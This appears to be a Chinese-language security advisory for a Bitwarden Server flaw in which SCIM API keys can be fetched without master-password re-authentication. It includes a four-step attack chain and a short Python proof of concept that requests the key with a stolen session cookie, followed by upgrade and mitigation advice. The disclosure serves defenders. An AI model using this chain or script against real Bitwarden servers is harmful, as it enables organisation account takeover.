CVE-2026-43640 Bitwarden Server SCIM密钥未重认证漏洞

漏洞信息

漏洞编号

CVE-2026-43640

漏洞类型

权限提升

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Bitwarden Server

漏洞概述

Bitwarden Server v2026.4.1之前版本在获取或轮换组织SCIM API密钥时未要求主密码重新认证。拥有SCIM管理权限的攻击者可利用有效会话直接获取密钥，导致敏感信息泄露及组织账户接管风险。

技术细节

该漏洞源于Bitwarden Server在处理敏感操作时的访问控制逻辑缺陷。具体而言，当具有SCIM管理权限的用户尝试检索或轮换组织的SCIM API Key时，系统仅验证了会话的有效性，而未强制要求输入主密码进行二次身份验证。攻击者若获取了管理员的有效会话令牌（例如通过XSS或会话劫持），即使不知道主密码，也可直接调用相关API端点获取SCIM密钥。由于SCIM密钥拥有管理组织用户的最高权限，一旦泄露，攻击者可完全控制组织的用户目录同步，添加或删除管理员，从而接管整个组织账户。

攻击链分析

STEP 1

1. 获取会话

攻击者通过XSS、中间人攻击或物理接触，获取具有SCIM管理权限用户的Bitwarden有效会话令牌。

STEP 2

2. 发起请求

攻击者使用该会话令牌向服务器发送获取SCIM API Key的请求，此时系统未要求主密码验证。

STEP 3

3. 获取密钥

服务器返回SCIM API Key，攻击者成功获取高权限凭证。

STEP 4

4. 接管组织

利用获取的SCIM Key，攻击者通过SCIM协议同步恶意数据，接管组织用户管理。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: Bitwarden Server SCIM Key Retrieval without Re-auth
# Description: Retrieve SCIM key using a valid session cookie without master password.

target_url = "https://bitwarden.example.com/scim/v2/organizations/<org_id>/key"
session_cookie = "<valid_session_cookie>"

headers = {
    "Cookie": f"BitwardenSession={session_cookie}",
    "Content-Type": "application/json"
}

try:
    response = requests.get(target_url, headers=headers)
    if response.status_code == 200:
        print("[+] Successfully retrieved SCIM Key:")
        print(response.text)
    else:
        print(f"[-] Failed to retrieve key. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Bitwarden Server < v2026.4.1

防御指南

临时缓解措施

建议立即升级Bitwarden Server至v2026.4.1或更高版本。在升级前，应严格审查具有SCIM管理权限的账户活动，并考虑暂时禁用SCIM功能以降低风险，同时强制用户重新登录以使旧会话失效。